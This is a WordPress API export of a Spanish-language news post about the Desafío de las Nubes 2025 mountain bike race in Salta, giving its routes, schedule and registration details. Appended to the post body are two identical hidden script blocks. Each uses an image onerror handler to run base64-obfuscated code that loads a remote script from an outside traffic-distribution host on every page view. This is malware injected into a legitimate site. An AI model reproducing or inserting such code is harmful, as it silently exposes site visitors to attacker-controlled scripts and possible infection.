{"id":5227,"date":"2025-06-04T18:03:20","date_gmt":"2025-06-04T21:03:20","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5227"},"modified":"2025-08-13T23:31:07","modified_gmt":"2025-08-14T02:31:07","slug":"la-carrera-de-mountain-bike-que-desafia-los-limites-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5227","title":{"rendered":"La carrera de Mountain Bike que desaf\u00eda los l\u00edmites en Salta"},"content":{"rendered":"\n<p><strong><em>El pr\u00f3ximo domingo 8 de junio, Salta ser\u00e1 nuevamente el epicentro del mountain bike nacional e internacional, con la realizaci\u00f3n del Desaf\u00edo de las Nubes 2025. Tendr\u00e1 como punto de largada y llegada el Parque Bicentenario y contar\u00e1 con cuatro circuitos: 80K Rural Bike ,50K Cross Country, 35K Cross Country y por \u00faltimo de 30K de Rural Bike.<\/em><\/strong><\/p>\n\n\n\n<p>El domingo 8 de junio, se desarrollar\u00e1 el Desaf\u00edo de las Nubes, en el Parque Bicentenario y recorrer\u00e1 la Loma Balc\u00f3n. Se trata de un cl\u00e1sico del calendario deportivo, convocando a ciclistas de todo el pa\u00eds y de pa\u00edses vecinos. Del lanzamiento particip\u00f3 el Subsecretario de Deportes Social; V\u00edctor Cuellar, autoridades municipales y el organizador de la carrera, Ramiro Cornejo.<\/p>\n\n\n\n<p>Como todos los a\u00f1os el, Gobierno la Provincia, acompa\u00f1a y apoya una de las competencias m\u00e1s importantes del calendario nacional de MTB; en tal sentido el Subsecretario de Deportes Social;&nbsp;<strong>V\u00edctor Cuella<\/strong>r, resalt\u00f3 que \u201cel Desaf\u00edo de las Nubes es una de las pruebas m\u00e1s importantes del norte argentino; ya consolidada en Salta y cada a\u00f1o vemos c\u00f3mo la comunidad ciclista se fortalece\u201d. Igualmente, agreg\u00f3 que esta carrera ha contribuido a la provincia, como un destino destacado para el ciclismo de monta\u00f1a, atrayendo a deportistas de todo el pa\u00eds y del extranjero.<\/p>\n\n\n\n<p>El organizador de la carrera, Ramiro Cornejo inform\u00f3 que ya se encuentran inscriptos m\u00e1s de 1.200 ciclistas de todas las provincias de la Argentina y de otros pa\u00edses. Tambi\u00e9n indic\u00f3 que la largada ser\u00e1 en el Parque del Bicentenario, recorriendo el Campo General Belgrano, en los predios del Ej\u00e9rcito, 4.000 hect\u00e1reas que integran la reserva natural \u00abLoma Balc\u00f3n\u201d.<\/p>\n\n\n\n<p>Por \u00faltimo, Cornejo inform\u00f3 que podr\u00e1n inscribirse hasta el mi\u00e9rcoles 4 de junio a trav\u00e9s del sitio oficial:&nbsp;<a href=\"https:\/\/www.desafiodelasnubes.com.ar.\/\">https:\/\/www.desafiodelasnubes.com.ar.<\/a>&nbsp;Adem\u00e1s, podr\u00e1n anotarse de manera presencial durante las jornadas del viernes y s\u00e1bado, cuya acreditaci\u00f3n se realizar\u00e1 en el Parque Bicentenario.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17714-la-carrera-de-mountain-bike-que-desafia-los-limites-en-salta.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17714-la-carrera-de-mountain-bike-que-desafia-los-limites-en-salta.webp\" alt=\"La carrera de Mountain Bike que desaf\u00eda los l\u00edmites en Salta\" style=\"width:379px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p><strong>Categor\u00edas y recorridos<\/strong><\/p>\n\n\n\n<p>La edici\u00f3n 2025 contar\u00e1 con cuatro circuitos adaptados a distintos niveles de experiencia:<\/p>\n\n\n\n<p>*- 80K Rural Bike<br>*- 50K Cross Country<br>*- 35K Cross Country<br>*- 30K Rural Bike<\/p>\n\n\n\n<p><strong>Cronograma de actividades<\/strong><\/p>\n\n\n\n<p>*- Viernes 6 de junio: Acreditaciones y Expo en el Parque Bicentenario de 15:00 a 19:00 hs.<br>*- S\u00e1bado 7 de junio: Continuaci\u00f3n de acreditaciones y Expo de 10:00 a 19:00 hs. Actividades especiales como test drives, charlas t\u00e9cnicas y circuitos para ni\u00f1os( 14:30).<br>*- Domingo 8 de junio: Competencias desde las 9:00 hs con largadas escalonadas seg\u00fan categor\u00eda. Las premiaciones se realizar\u00e1n a partir de las 13:00 hs.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El pr\u00f3ximo domingo 8 de junio, Salta ser\u00e1 nuevamente el epicentro del mountain bike nacional e internacional, con la realizaci\u00f3n del Desaf\u00edo de las Nubes 2025. Tendr\u00e1 como punto de largada y llegada el Parque Bicentenario y contar\u00e1 con cuatro circuitos: 80K Rural Bike ,50K Cross Country, 35K Cross Country y por \u00faltimo de 30K [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5228,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[18],"tags":[],"class_list":{"0":"post-5227","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5227"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5227"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5227\/revisions"}],"predecessor-version":[{"id":6471,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5227\/revisions\/6471"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5228"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5227"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5227"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5227"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}